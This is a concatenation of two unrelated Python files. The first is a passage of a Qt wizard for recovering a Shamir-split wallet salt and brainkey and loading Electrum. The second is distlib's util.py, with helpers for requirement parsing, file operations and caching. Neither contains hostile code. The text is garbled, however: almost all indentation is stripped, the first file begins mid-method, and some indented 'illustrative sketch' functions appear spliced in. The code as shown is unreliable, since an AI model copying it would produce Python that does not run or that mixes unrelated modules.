def next_panel_clazz(self) -> Type[gpb.Panel]:
state = gpb.shared_panel_state
if state['panel_index'] == 0:
state['panel_index'] = max(state['panel_index'] + 1, 0)
return OpenWalletPanel
else:
return LoadWalletPanel
def destroy_panel(self) -> None:
state = gpb.shared_panel_state
recovered_datas = self.recover_datas()
if all(recovered_datas):
recovered_data = b"".join(recovered_datas) # type: ignore
params = gpb.get_params()
lens = parameters.raw_secret_lens()
if state['panel_index'] == 0:
assert len(recovered_data) == lens.salt
header = recovered_data[: parameters.SALT_HEADER_LEN]
state['params'] = parameters.bytes2params(header)
state['salt' ] = ct.Salt(recovered_data)
else:
assert len(recovered_data) == lens.brainkey
state['brainkey'] = ct.BrainKey(recovered_data)
params = state['params']
salt = state['salt']
brainkey = state['brainkey']
if params and salt and brainkey:
raw_salt = ct.RawSalt(bytes(salt)[parameters.SALT_HEADER_LEN :])
shares = shamir.split(params, raw_salt, brainkey)
state['shares'] = shares
super().destroy_panel()
class LoadWalletPanel(gpb.Panel):
task: Optional[gt.SeedDerivationTask]
def __init__(self, index: int):
self.title = "Key Derivation ..."
super().__init__(index)
self._layout = qtw.QVBoxLayout()
label = qtw.QLabel("KDF Derivation")
self.progressbar = qtw.QProgressBar()
self.progressbar.setRange(0, 5000)
self.progressbar.setValue(0)
# Instantiated in switch(), because we want fresh parameters
# from previous panel every time.
self.task = None
self._layout.addWidget(label)
self._layout.addWidget(self.progressbar)
self._layout.addStretch(1)
self.setLayout(self._layout)
def switch(self) -> None:
self.trace("switch")
state = gpb.get_state()
seed_data = state['seed_data']
params = state['params']
assert params is not None
if seed_data is None:
salt = state['salt']
brainkey = state['brainkey']
assert salt is not None
assert brainkey is not None
self.task = gt.SeedDerivationTask(params, salt, brainkey)
self.task.progress.connect(progressbar_updater(self.progressbar))
            self.task.finished.connect(self.on_key_derivation_done)
super().switch()
self.trace("start derivation")
self.task.start()
else:
# seed_data freshly generated
load_wallet()
self.parent().close()
return
    def on_key_derivation_done(self, status: str) -> None:
        if status == 'ok':
            self.trace("LoadWalletPanel.on_key_derivation_done")
load_wallet()
self.parent().close()
else:
qtw.QMessageBox.critical(self, 'Error', status)
self.parent().close()
def is_final_panel(self) -> bool:
# pylint: disable=no-self-use # override for ABC
return True
def progressbar_updater(progressbar: qtw.QProgressBar) -> Callable[[gt.ProgressStatus], None]:
def update_progressbar(status: gt.ProgressStatus) -> None:
try:
progressbar.setRange(0, status.length)
progressbar.setValue(round(status.current))
except RuntimeError:
pass
return update_progressbar
def load_wallet() -> None:
def launch():
seed_data = gpb.shared_panel_state['seed_data']
offline = gpb.shared_panel_state['offline']
assert seed_data is not None
ui_common.load_wallet(seed_data, offline)
launcher_thread = threading.Thread(target=launch, daemon=False)
launcher_thread.start()
# Delay closing the panel while the wallet loads
# this is a bit less jarring.
electrum_daemon_path = pl.Path("~").expanduser() / ".electrum" / "daemon"
wait_start = time.time()
while True:
if os.path.exists(electrum_daemon_path):
time.sleep(0.5)
return
if time.time() - wait_start > 5:
return
time.sleep(0.1)
class RecoverKeysPanel(gpb.EnterSecretPanel):
def __init__(self, index: int):
self.title = "Recover Wallet"
super().__init__(index)
def label_text(self) -> str:
params = gpb.get_params()
if params is None:
num_shares = -1
else:
num_shares = params.sss_n
panel_index = gpb.shared_panel_state['panel_index']
share_no = panel_index + 1
if num_shares == -1:
return f"Enter Share {share_no}/N"
else:
return f"Enter Share {share_no}/{num_shares}"
def secret_len(self) -> int:
lens = parameters.raw_secret_lens()
return lens.share
def destroy_panel(self) -> None:
recovered_datas = self.recover_datas()
if all(recovered_datas):
share_data = ct.Share(b"".join(recovered_datas)) # type: ignore
shares = gpb.shared_panel_state['shares']
gpb.shared_panel_state['shares'] = list(shares) + [share_data]
super().destroy_panel()
@property
def back_panel_clazz(self) -> Type[gpb.Panel]:
panel_index = gpb.shared_panel_state['panel_index']
if panel_index == 0:
return SelectCommandPanel
else:
gpb.shared_panel_state['panel_index'] = max(panel_index - 1, 0)
return RecoverKeysPanel
@property
def next_panel_clazz(self) -> Type[gpb.Panel]:
state = gpb.shared_panel_state
panel_index = state['panel_index']
if panel_index == 0:
state['panel_index'] = panel_index + 1
return RecoverKeysPanel
else:
params = gpb.get_params()
# we should only reach here if a valid share was entered previously
assert params is not None
if len(state['shares']) < params.sss_n:
state['panel_index'] = panel_index + 1
return RecoverKeysPanel
else:
state['panel_index'] = 0
raw_salt, brainkey = shamir.join(state['shares'])
                # recompute shares, because the user only enters as many as are needed
shares = shamir.split(params, raw_salt, brainkey)
params_data = parameters.params2bytes(params)
salt = ct.Salt(params_data[:2] + raw_salt)
state['salt' ] = salt
state['brainkey'] = brainkey
state['shares' ] = shares
return RecoverKeysShowPanel
def is_final_panel(self) -> bool:
params = gpb.get_params()
assert params is not None
return len(gpb.shared_panel_state['shares']) >= params.sss_n
class RecoverKeysShowPanel(ShowKeysPanel):
def __init__(self, index: int):
self.title = "Recover Keys"
super().__init__(index)
def label_text(self) -> str:
panel_index = gpb.shared_panel_state['panel_index']
if panel_index == 0:
return "Recovered Salt"
elif panel_index == 1:
return "Recovered Brainkey"
else:
raise ValueError(f"Invalid state {panel_index:=}")
def get_current_secret(self) -> gpb.CurrentSecret:
panel_index = gpb.shared_panel_state['panel_index']
if panel_index == 0:
return gpb.get_secret('salt')
elif panel_index == 1:
return gpb.get_secret('brainkey')
else:
raise RuntimeError(f"Invalid {panel_index:=}")
@property
def back_panel_clazz(self) -> Type[gpb.Panel]:
self.trace(f"back show {gpb.shared_panel_state['panel_index']}")
if gpb.shared_panel_state['panel_index'] == 0:
return RecoverKeysPanel
else:
gpb.shared_panel_state['panel_index'] -= 1
return RecoverKeysShowPanel
@property
def next_panel_clazz(self) -> Type[gpb.Panel]:
if gpb.shared_panel_state['panel_index'] == 0:
gpb.shared_panel_state['panel_index'] += 1
return RecoverKeysShowPanel
else:
return LoadWalletPanel
|
util.py
|
#
# Copyright (C) 2012-2016 The Python Software Foundation.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
import codecs
from collections import deque
import contextlib
import csv
from glob import iglob as std_iglob
import io
import json
import logging
import os
import py_compile
import re
import shutil
import socket
try:
import ssl
except ImportError:
ssl = None
import subprocess
import sys
import tarfile
import tempfile
import textwrap
try:
import threading
except ImportError:
import dummy_threading as threading
import time
from . import DistlibException
from .compat import (string_types, text_type, shutil, raw_input, StringIO,
cache_from_source, urlopen, urljoin, httplib, xmlrpclib,
splittype, HTTPHandler, BaseConfigurator, valid_ident,
Container, configparser, URLError, ZipFile, fsdecode)
logger = logging.getLogger(__name__)
#
# Requirement parsing code for name + optional constraints + optional extras
#
# e.g. 'foo >= 1.2, < 2.0 [bar, baz]'
#
# The regex can seem a bit hairy, so we build it up out of smaller pieces
# which are manageable.
#
COMMA = r'\s*,\s*'
COMMA_RE = re.compile(COMMA)
IDENT = r'(\w|[.-])+'
EXTRA_IDENT = r'(\*|:(\*|\w+):|' + IDENT + ')'
VERSPEC = IDENT + r'\*?'
RELOP = '([<>=!~]=)|[<>]'
#
# The first relop is optional - if absent, will be taken as '~='
#
BARE_CONSTRAINTS = ('(' + RELOP + r')?\s*(' + VERSPEC + ')(' + COMMA + '(' +
RELOP + r')\s*(' + VERSPEC + '))*')
DIRECT_REF = r'(from\s+(?P<diref>.*))'
#
# Either the bare constraints or the bare constraints in parentheses
#
CONSTRAINTS = (r'\(\s*(?P<c1>' + BARE_CONSTRAINTS + '|' + DIRECT_REF +
               r')\s*\)|(?P<c2>' + BARE_CONSTRAINTS + r'\s*)')
EXTRA_LIST = EXTRA_IDENT + '(' + COMMA + EXTRA_IDENT + ')*'
EXTRAS = r'\[\s*(?P<ex>' + EXTRA_LIST + r')?\s*\]'
REQUIREMENT = ('(?P<dn>' + IDENT + r')\s*(' + EXTRAS + r'\s*)?(\s*' +
CONSTRAINTS + ')?$')
REQUIREMENT_RE = re.compile(REQUIREMENT)
#
# Used to scan through the constraints
#
RELOP_IDENT = '(?P<op>' + RELOP + r')\s*(?P<vn>' + VERSPEC + ')'
RELOP_IDENT_RE = re.compile(RELOP_IDENT)
def parse_requirement(s):
def get_constraint(m):
d = m.groupdict()
return d['op'], d['vn']
result = None
m = REQUIREMENT_RE.match(s)
if m:
d = m.groupdict()
name = d['dn']
cons = d['c1'] or d['c2']
if not d['diref']:
url = None
else:
# direct reference
cons = None
url = d['diref'].strip()
if not cons:
cons = None
constr = ''
rs = d['dn']
else:
if cons[0] not in '<>!=':
cons = '~=' + cons
iterator = RELOP_IDENT_RE.finditer(cons)
cons = [get_constraint(m) for m in iterator]
rs = '%s (%s)' % (name, ', '.join(['%s %s' % con for con in cons]))
if not d['ex']:
extras = None
else:
extras = COMMA_RE.split(d['ex'])
result = Container(name=name, constraints=cons, extras=extras,
requirement=rs, source=s, url=url)
return result
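# Illustrative sketch: shows the shape of the Container returned by
# parse_requirement(). The requirement string is an assumed example, written
# with the extras before the parenthesised constraints, which is the order
# the REQUIREMENT regex above expects.
def _example_parse_requirement():  # pragma: no cover - documentation only
    r = parse_requirement('foo [bar, baz] (>= 1.2, < 2.0)')
    assert r.name == 'foo'
    assert r.extras == ['bar', 'baz']
    assert r.constraints == [('>=', '1.2'), ('<', '2.0')]
    assert r.requirement == 'foo (>= 1.2, < 2.0)'
    assert r.url is None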
def get_resources_dests(resources_root, rules):
"""Find destinations for resources files"""
def get_rel_path(base, path):
# normalizes and returns a lstripped-/-separated path
base = base.replace(os.path.sep, '/')
path = path.replace(os.path.sep, '/')
assert path.startswith(base)
return path[len(base):].lstrip('/')
destinations = {}
for base, suffix, dest in rules:
prefix = os.path.join(resources_root, base)
for abs_base in iglob(prefix):
abs_glob = os.path.join(abs_base, suffix)
for abs_path in iglob(abs_glob):
resource_file = get_rel_path(resources_root, abs_path)
if dest is None: # remove the entry if it was here
destinations.pop(resource_file, None)
else:
rel_path = get_rel_path(abs_base, abs_path)
rel_dest = dest.replace(os.path.sep, '/').rstrip('/')
destinations[resource_file] = rel_dest + '/' + rel_path
return destinations
def in_venv():
if hasattr(sys, 'real_prefix'):
# virtualenv venvs
result = True
else:
# PEP 405 venvs
result = sys.prefix != getattr(sys, 'base_prefix', sys.prefix)
return result
def get_executable():
# The __PYVENV_LAUNCHER__ dance is apparently no longer needed, as
# changes to the stub launcher mean that sys.executable always points
# to the stub on OS X
# if sys.platform == 'darwin' and ('__PYVENV_LAUNCHER__'
# in os.environ):
# result = os.environ['__PYVENV_LAUNCHER__']
# else:
# result = sys.executable
# return result
result = os.path.normcase(sys.executable)
if not isinstance(result, text_type):
result = fsdecode(result)
return result
def proceed(prompt, allowed_chars, error_prompt=None, default=None):
p = prompt
while True:
s = raw_input(p)
p = prompt
if not s and default:
s = default
if s:
c = s[0].lower()
if c in allowed_chars:
break
if error_prompt:
p = '%c: %s\n%s' % (c, error_prompt, prompt)
return c
def extract_by_key(d, keys):
if isinstance(keys, string_types):
keys = keys.split()
result = {}
for key in keys:
if key in d:
result[key] = d[key]
return result
def read_exports(stream):
if sys.version_info[0] >= 3:
# needs to be a text stream
stream = codecs.getreader('utf-8')(stream)
# Try to load as JSON, falling back on legacy format
data = stream.read()
stream = StringIO(data)
try:
jdata = json.load(stream)
result = jdata['extensions']['python.exports']['exports']
for group, entries in result.items():
for k, v in entries.items():
s = '%s = %s' % (k, v)
entry = get_export_entry(s)
assert entry is not None
entries[k] = entry
return result
except Exception:
stream.seek(0, 0)
def read_stream(cp, stream):
if hasattr(cp, 'read_file'):
cp.read_file(stream)
else:
cp.readfp(stream)
cp = configparser.ConfigParser()
try:
read_stream(cp, stream)
except configparser.MissingSectionHeaderError:
stream.close()
data = textwrap.dedent(data)
stream = StringIO(data)
read_stream(cp, stream)
result = {}
for key in cp.sections():
result[key] = entries = {}
for name, value in cp.items(key):
s = '%s = %s' % (name, value)
entry = get_export_entry(s)
assert entry is not None
#entry.dist = self
entries[name] = entry
return result
def write_exports(exports, stream):
if sys.version_info[0] >= 3:
# needs to be a text stream
stream = codecs.getwriter('utf-8')(stream)
cp = configparser.ConfigParser()
for k, v in exports.items():
# TODO check k, v for valid values
cp.add_section(k)
for entry in v.values():
if entry.suffix is None:
s = entry.prefix
else:
s = '%s:%s' % (entry.prefix, entry.suffix)
if entry.flags:
s = '%s [%s]' % (s, ', '.join(entry.flags))
cp.set(k, entry.name, s)
cp.write(stream)
@contextlib.contextmanager
def tempdir():
td = tempfile.mkdtemp()
try:
yield td
finally:
shutil.rmtree(td)
@contextlib.contextmanager
def chdir(d):
cwd = os.getcwd()
try:
os.chdir(d)
yield
finally:
os.chdir(cwd)
@contextlib.contextmanager
def socket_timeout(seconds=15):
cto = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(seconds)
yield
finally:
socket.setdefaulttimeout(cto)
class cached_property(object):
def __init__(self, func):
self.func = func
#for attr in ('__name__', '__module__', '__doc__'):
# setattr(self, attr, getattr(func, attr, None))
def __get__(self, obj, cls=None):
if obj is None:
return self
value = self.func(obj)
object.__setattr__(obj, self.func.__name__, value)
#obj.__dict__[self.func.__name__] = value = self.func(obj)
return value
def convert_path(pathname):
"""Return 'pathname' as a name that will work on the native filesystem.
The path is split on '/' and put back together again using the current
directory separator. Needed because filenames in the setup script are
always supplied in Unix style, and have to be converted to the local
convention before we can actually use them in the filesystem. Raises
ValueError on non-Unix-ish systems if 'pathname' either starts or
ends with a slash.
"""
if os.sep == '/':
return pathname
if not pathname:
return pathname
if pathname[0] == '/':
raise ValueError("path '%s' cannot be absolute" % pathname)
if pathname[-1] == '/':
raise ValueError("path '%s' cannot end with '/'" % pathname)
paths = pathname.split('/')
while os.curdir in paths:
paths.remove(os.curdir)
if not paths:
return os.curdir
return os.path.join(*paths)
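# Illustrative sketch: convert_path() turns the '/'-separated names used in
# setup scripts into native paths, so the result below equals
# os.path.join('docs', 'index.rst') on every platform. The path is an
# assumed example.
def _example_convert_path():  # pragma: no cover - documentation only
    assert convert_path('docs/index.rst') == os.path.join('docs', 'index.rst')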
class FileOperator(object):
def __init__(self, dry_run=False):
self.dry_run = dry_run
self.ensured = set()
self._init_record()
def _init_record(self):
self.record = False
self.files_written = set()
self.dirs_created = set()
def record_as_written(self, path):
if self.record:
self.files_written.add(path)
def newer(self, source, target):
"""Tell if the target is newer than the source.
Returns true if 'source' exists and is more recently modified than
'target', or if 'source' exists and 'target' doesn't.
Returns false if both exist and 'target' is the same age or younger
        than 'source'. Raise DistlibException if 'source' does not exist.
Note that this test is not very accurate: files created in the same
second will have the same "age".
"""
if not os.path.exists(source):
raise DistlibException("file '%r' does not exist" %
os.path.abspath(source))
if not os.path.exists(target):
return True
return os.stat(source).st_mtime > os.stat(target).st_mtime
def copy_file(self, infile, outfile, check=True):
"""Copy a file respecting dry-run and force flags.
"""
self.ensure_dir(os.path.dirname(outfile))
logger.info('Copying %s to %s', infile, outfile)
if not self.dry_run:
msg = None
if check:
if os.path.islink(outfile):
msg = '%s is a symlink' % outfile
elif os.path.exists(outfile) and not os.path.isfile(outfile):
msg = '%s is a non-regular file' % outfile
if msg:
raise ValueError(msg + ' which would be overwritten')
shutil.copyfile(infile, outfile)
self.record_as_written(outfile)
def copy_stream(self, instream, outfile, encoding=None):
assert not os.path.isdir(outfile)
self.ensure_dir(os.path.dirname(outfile))
logger.info('Copying stream %s to %s', instream, outfile)
if not self.dry_run:
if encoding is None:
outstream = open(outfile, 'wb')
else:
outstream = codecs.open(outfile, 'w', encoding=encoding)
try:
shutil.copyfileobj(instream, outstream)
finally:
outstream.close()
self.record_as_written(outfile)
def write_binary_file(self, path, data):
self.ensure_dir(os.path.dirname(path))
if not self.dry_run:
with open(path, 'wb') as f:
f.write(data)
self.record_as_written(path)
def write_text_file(self, path, data, encoding):
self.ensure_dir(os.path.dirname(path))
if not self.dry_run:
with open(path, 'wb') as f:
f.write(data.encode(encoding))
self.record_as_written(path)
def set_mode(self, bits, mask, files):
if os.name == 'posix' or (os.name == 'java' and os._name == 'posix'):
# Set the executable bits (owner, group, and world) on
# all the files specified.
for f in files:
if self.dry_run:
logger.info("changing mode of %s", f)
else:
mode = (os.stat(f).st_mode | bits) & mask
logger.info("changing mode of %s to %o", f, mode)
os.chmod(f, mode)
set_executable_mode = lambda s, f: s.set_mode(0o555, 0o7777, f)
def ensure_dir(self, path):
path = os.path.abspath(path)
if path not in self.ensured and not os.path.exists(path):
self.ensured.add(path)
d, f = os.path.split(path)
self.ensure_dir(d)
logger.info('Creating %s' % path)
if not self.dry_run:
os.mkdir(path)
if self.record:
self.dirs_created.add(path)
def byte_compile(self, path, optimize=False, force=False, prefix=None):
dpath = cache_from_source(path, not optimize)
logger.info('Byte-compiling %s to %s', path, dpath)
if not self.dry_run:
if force or self.newer(path, dpath):
if not prefix:
diagpath = None
else:
assert path.startswith(prefix)
diagpath = path[len(prefix):]
py_compile.compile(path, dpath, diagpath, True) # raise error
self.record_as_written(dpath)
return dpath
def ensure_removed(self, path):
if os.path.exists(path):
if os.path.isdir(path) and not os.path.islink(path):
logger.debug('Removing directory tree at %s', path)
if not self.dry_run:
shutil.rmtree(path)
if self.record:
if path in self.dirs_created:
self.dirs_created.remove(path)
else:
if os.path.islink(path):
s = 'link'
else:
s = 'file'
logger.debug('Removing %s %s', s, path)
if not self.dry_run:
os.remove(path)
if self.record:
if path in self.files_written:
self.files_written.remove(path)
def is_writable(self, path):
result = False
while not result:
if os.path.exists(path):
result = os.access(path, os.W_OK)
break
parent = os.path.dirname(path)
if parent == path:
break
path = parent
return result
def commit(self):
"""
Commit recorded changes, turn off recording, return
changes.
"""
assert self.record
result = self.files_written, self.dirs_created
self._init_record()
return result
def rollback(self):
if not self.dry_run:
for f in list(self.files_written):
if os.path.exists(f):
os.remove(f)
# dirs should all be empty now, except perhaps for
# __pycache__ subdirs
# reverse so that subdirs appear before their parents
dirs = sorted(self.dirs_created, reverse=True)
for d in dirs:
flist = os.listdir(d)
if flist:
assert flist == ['__pycache__']
sd = os.path.join(d, flist[0])
os.rmdir(sd)
os.rmdir(d) # should fail if non-empty
self._init_record()
def resolve(module_name, dotted_path):
if module_name in sys.modules:
mod = sys.modules[module_name]
else:
mod = __import__(module_name)
if dotted_path is None:
result = mod
else:
parts = dotted_path.split('.')
result = getattr(mod, parts.pop(0))
for p in parts:
result = getattr(result, p)
return result
class ExportEntry(object):
def __init__(self, name, prefix, suffix, flags):
self.name = name
self.prefix = prefix
self.suffix = suffix
self.flags = flags
@cached_property
def value(self):
return resolve(self.prefix, self.suffix)
def __repr__(self):
return '<ExportEntry %s = %s:%s %s>' % (self.name, self.prefix,
self.suffix, self.flags)
def __eq__(self, other):
if not isinstance(other, ExportEntry):
result = False
else:
result = (self.name == other.name and
self.prefix == other.prefix and
self.suffix == other.suffix and
self.flags == other.flags)
return result
__hash__ = object.__hash__
ENTRY_RE = re.compile(r'''(?P<name>(\w|[-.+])+)
\s*=\s*(?P<callable>(\w+)([:\.]\w+)*)
\s*(\[\s*(?P<flags>\w+(=\w+)?(,\s*\w+(=\w+)?)*)\s*\])?
''', re.VERBOSE)
def get_export_entry(specification):
m = ENTRY_RE.search(specification)
if not m:
result = None
if '[' in specification or ']' in specification:
raise DistlibException('Invalid specification '
'%r' % specification)
else:
d = m.groupdict()
name = d['name']
path = d['callable']
colons = path.count(':')
if colons == 0:
prefix, suffix = path, None
else:
if colons != 1:
raise DistlibException('Invalid specification '
'%r' % specification)
prefix, suffix = path.split(':')
flags = d['flags']
if flags is None:
if '[' in specification or ']' in specification:
raise DistlibException('Invalid specification '
'%r' % specification)
flags = []
else:
flags = [f.strip() for f in flags.split(',')]
result = ExportEntry(name, prefix, suffix, flags)
return result
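# Illustrative sketch: the specification string is an assumed example of the
# 'name = prefix:suffix [flags]' form matched by ENTRY_RE above.
def _example_get_export_entry():  # pragma: no cover - documentation only
    entry = get_export_entry('frob = foo.bar:baz [a=1, b]')
    assert entry.name == 'frob'
    assert entry.prefix == 'foo.bar'
    assert entry.suffix == 'baz'
    assert entry.flags == ['a=1', 'b']
    # entry.value would import the (hypothetical) foo.bar module and
    # resolve its 'baz' attribute, so it is not evaluated here.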
def get_cache_base(suffix=None):
"""
Return the default base location for distlib caches. If the directory does
not exist, it is created. Use the suffix provided for the base directory,
and default to '.distlib' if it isn't provided.
On Windows, if LOCALAPPDATA is defined in the environment, then it is
assumed to be a directory, and will be the parent directory of the result.
On POSIX, and on Windows if LOCALAPPDATA is not defined, the user's home
    directory - using os.path.expanduser('~') - will be the parent directory of
the result.
The result is just the directory '.distlib' in the parent directory as
determined above, or with the name specified with ``suffix``.
"""
if suffix is None:
suffix = '.distlib'
if os.name == 'nt' and 'LOCALAPPDATA' in os.environ:
result = os.path.expandvars('$localappdata')
else:
# Assume posix, or old Windows
result = os.path.expanduser('~')
# we use 'isdir' instead of 'exists', because we want to
# fail if there's a file with that name
if os.path.isdir(result):
usable = os.access(result, os.W_OK)
if not usable:
logger.warning('Directory exists but is not writable: %s', result)
else:
try:
os.makedirs(result)
usable = True
except OSError:
logger.warning('Unable to create %s', result, exc_info=True)
usable = False
if not usable:
result = tempfile.mkdtemp()
logger.warning('Default location unusable, using %s', result)
return os.path.join(result, suffix)
def path_to_cache_dir(path):
"""
Convert an absolute path to a directory name for use in a cache.
The algorithm used is:
#. On Windows, any ``':'`` in the drive is replaced with ``'---'``.
#. Any occurrence of ``os.sep`` is replaced with ``'--'``.
#. ``'.cache'`` is appended.
"""
d, p = os.path.splitdrive(os.path.abspath(path))
if d:
d = d.replace(':', '---')
p = p.replace(os.sep, '--')
return d + p + '.cache'
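# Illustrative sketch: the expected value depends on os.sep, so the assumed
# example path is only checked on POSIX.
def _example_path_to_cache_dir():  # pragma: no cover - documentation only
    if os.sep == '/':
        assert path_to_cache_dir('/home/user/libs') == '--home--user--libs.cache'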
def ensure_slash(s):
if not s.endswith('/'):
return s + '/'
return s
def parse_credentials(netloc):
username = password = None
if '@' in netloc:
prefix, netloc = netloc.split('@', 1)
if ':' not in prefix:
username = prefix
else:
username, password = prefix.split(':', 1)
return username, password, netloc
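# Illustrative sketch: the netloc values are assumed examples.
def _example_parse_credentials():  # pragma: no cover - documentation only
    assert (parse_credentials('user:secret@pypi.example.org') ==
            ('user', 'secret', 'pypi.example.org'))
    assert parse_credentials('pypi.example.org') == (None, None, 'pypi.example.org')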
def get_process_umask():
result = os.umask(0o22)
os.umask(result)
return result
def is_string_sequence(seq):
result = True
i = None
for i, s in enumerate(seq):
if not isinstance(s, string_types):
result = False
break
assert i is not None
return result
PROJECT_NAME_AND_VERSION = re.compile('([a-z0-9_]+([.-][a-z_][a-z0-9_]*)*)-'
'([a-z0-9_.+-]+)', re.I)
PYTHON_VERSION = re.compile(r'-py(\d\.?\d?)')
def split_filename(filename, project_name=None):
"""
Extract name, version, python version from a filename (no extension)
Return name, version, pyver or None
"""
result = None
pyver = None
m = PYTHON_VERSION.search(filename)
if m:
pyver = m.group(1)
filename = filename[:m.start()]
if project_name and len(filename) > len(project_name) + 1:
m = re.match(re.escape(project_name) + r'\b', filename)
if m:
n = m.end()
result = filename[:n], filename[n + 1:], pyver
if result is None:
m = PROJECT_NAME_AND_VERSION.match(filename)
if m:
result = m.group(1), m.group(3), pyver
return result
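# Illustrative sketch: the filenames are assumed examples of the
# '<name>-<version>[-py<X.Y>]' convention handled above.
def _example_split_filename():  # pragma: no cover - documentation only
    assert split_filename('sphinx-1.2b1-py2.7') == ('sphinx', '1.2b1', '2.7')
    assert split_filename('python-dateutil-2.4.0', 'python-dateutil') == \
        ('python-dateutil', '2.4.0', None)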
# Allow spaces in name because of legacy dists like "Twisted Core"
NAME_VERSION_RE = re.compile(r'(?P<name>[\w .-]+)\s*'
r'\(\s*(?P<ver>[^\s)]+)\)$')
def parse_name_and_version(p):
"""
A utility method used to get name and version from a string.
From e.g. a Provides-Dist value.
:param p: A value in a form 'foo (1.0)'
:return: The name and version as a tuple.
"""
m = NAME_VERSION_RE.match(p)
if not m:
raise DistlibException('Ill-formed name/version string: \'%s\'' % p)
d = m.groupdict()
return d['name'].strip().lower(), d['ver']
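# Illustrative sketch: the input is an assumed Provides-Dist style value.
def _example_parse_name_and_version():  # pragma: no cover - documentation only
    assert parse_name_and_version('Foo (1.0b1)') == ('foo', '1.0b1')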
def get_extras(requested, available):
result = set()
requested = set(requested or [])
available = set(available or [])
if '*' in requested:
requested.remove('*')
result |= available
for r in requested:
if r == '-':
result.add(r)
elif r.startswith('-'):
unwanted = r[1:]
if unwanted not in available:
logger.warning('undeclared extra: %s' % unwanted)
if unwanted in result:
result.remove(unwanted)
else:
if r not in available:
logger.warning('undeclared extra: %s' % r)
result.add(r)
return result
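# Illustrative sketch: '*' requests every available extra and a '-' prefix
# removes one again; the extra names are assumed examples.
def _example_get_extras():  # pragma: no cover - documentation only
    assert get_extras(['*', '-tests'], ['docs', 'tests']) == {'docs'}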
#
# Extended metadata functionality
#
def _get_external_data(url):
result = {}
try:
# urlopen might fail if it runs into redirections,
# because of Python issue #13696. Fixed in locators
# using a custom redirect handler.
resp = urlopen(url)
headers = resp.info()
ct = headers.get('Content-Type')
if not ct.startswith('application/json'):
logger.debug('Unexpected response for JSON request: %s', ct)
else:
reader = codecs.getreader('utf-8')(resp)
#data = reader.read().decode('utf-8')
#result = json.loads(data)
result = json.load(reader)
except Exception as e:
logger.exception('Failed to get external data for %s: %s', url, e)
return result
_external_data_base_url = 'https://www.red-dove.com/pypi/projects/'
def get_project_data(name):
url = '%s/%s/project.json' % (name[0].upper(), name)
url = urljoin(_external_data_base_url, url)
result = _get_external_data(url)
return result
def get_package_data(name, version):
url = '%s/%s/package-%s.json' % (name[0].upper(), name, version)
url = urljoin(_external_data_base_url, url)
return _get_external_data(url)
class Cache(object):
"""
A class implementing a cache for resources that need to live in the file system
e.g. shared libraries. This class was moved from resources to here because it
could be used by other modules, e.g. the wheel module.
"""
def __init__(self, base):
"""
Initialise an instance.
:param base: The base directory where the cache should be located.
"""
# we use 'isdir' instead of 'exists', because we want to
# fail if there's a file with that name
if not os.path.isdir(base):
os.makedirs(base)
if (os.stat(base).st_mode & 0o77) != 0:
logger.warning('Directory \'%s\' is not private', base)
self.base = os.path.abspath(os.path.normpath(base))
def prefix_to_dir(self, prefix):
"""
Converts a resource prefix to a directory name in the cache.
"""
return path_to_cache_dir(prefix)
def clear(self):
"""
Clear the cache.
"""
not_removed = []
for fn in os.listdir(self.base):
fn = os.path.join(self.base, fn)
try:
if os.path.islink(fn) or os.path.isfile(fn):
os.remove(fn)
elif os.path.isdir(fn):
shutil.rmtree(fn)
except Exception:
not_removed.append(fn)
return not_removed
class EventMixin(object):
"""
A very simple publish/subscribe system.
"""
def __init__(self):
self._subscribers = {}
def add(self, event, subscriber, append=True):
"""
Add a subscriber for an event.
:param event: The name of an event.
:param subscriber: The subscriber to be added (and called when the
event is published).
:param append: Whether to append or prepend the subscriber to an
existing subscriber list for the event.
"""
subs = self._subscribers
if event not in subs:
subs[event] = deque([subscriber])
else:
sq = subs[event]
if append:
sq.append(subscriber)
else:
sq.appendleft(subscriber)
def remove(self, event, subscriber):
"""
Remove a subscriber for an event.
:param event: The name of an event.
:param subscriber: The subscriber to be removed.
"""
subs = self._subscribers
if event not in subs:
raise ValueError('No subscribers: %r' % event)
subs[event].remove(subscriber)
def get_subscribers(self, event):
"""
Return an iterator for the subscribers for an event.
:param event: The event to return subscribers for.
"""
return iter(self._subscribers.get(event, ()))
def publish(self, event, *args, **kwargs):
"""
        Publish an event and return a list of values returned by its
subscribers.
:param event: The event to publish.
:param args: The positional arguments to pass to the event's
subscribers.
:param kwargs: The keyword arguments to pass to the event's
subscribers.
"""
result = []
for subscriber in self.get_subscribers(event):
try:
value = subscriber(event, *args, **kwargs)
except Exception:
logger.exception('Exception during event publication')
value = None
result.append(value)
logger.debug('publish %s: args = %s, kwargs = %s, result = %s',
event, args, kwargs, result)
return result
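# Illustrative sketch: a minimal publish/subscribe round trip using
# EventMixin. The event name and subscriber are assumed examples.
def _example_event_mixin():  # pragma: no cover - documentation only
    class Notifier(EventMixin):
        pass
    notifier = Notifier()
    notifier.add('built', lambda event, name: 'built %s' % name)
    assert notifier.publish('built', name='demo') == ['built demo']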
#
# Simple sequencing
#
class Sequencer(object):
def __init__(self):
self._preds = {}
self._succs = {}
self._nodes = set() # nodes with no preds/succs
def add_node(self, node):
self._nodes.add(node)
def remove_node(self, node, edges=False):
if node in self._nodes:
self._nodes.remove(node)
if edges:
for p in set(self._preds.get(node, ())):
self.remove(p, node)
for s in set(self._succs.get(node, ())):
self.remove(node, s)
# Remove empties
for k, v in list(self._preds.items()):
if not v:
del self._preds[k]
for k, v in list(self._succs.items()):
if not v:
del self._succs[k]
def add(self, pred, succ):
assert pred != succ
self._preds.setdefault(succ, set()).add(pred)
self._succs.setdefault(pred, set()).add(succ)
def remove(self, pred, succ):
assert pred != succ
try:
preds = self._preds[succ]
succs = self._succs[pred]
except KeyError:
raise ValueError('%r not a successor of anything' % succ)
try:
preds.remove(pred)
succs.remove(succ)
except KeyError:
raise ValueError('%r not a successor of %r' % (succ, pred))
def is_step(self, step):
return (step in self._preds or step in self._succs or
step in self._nodes)
def get_steps(self, final):
if not self.is_step(final):
raise ValueError('Unknown: %r' % final)
result = []
todo = []
seen = set()
todo.append(final)
while todo:
step = todo.pop(0)
if step in seen:
# if a step was already seen,
# move it to the end (so it will appear earlier
# when reversed on return) ... but not for the
# final step, as that would be confusing for
# users
if step != final:
result.remove(step)
result.append(step)
else:
seen.add(step)
result.append(step)
preds = self._preds.get(step, ())
todo.extend(preds)
return reversed(result)
@property
def strong_connections(self):
#http://en.wikipedia.org/wiki/Tarjan%27s_strongly_connected_components_algorithm
index_counter = [0]
stack = []
lowlinks = {}
index = {}
result = []
graph = self._succs
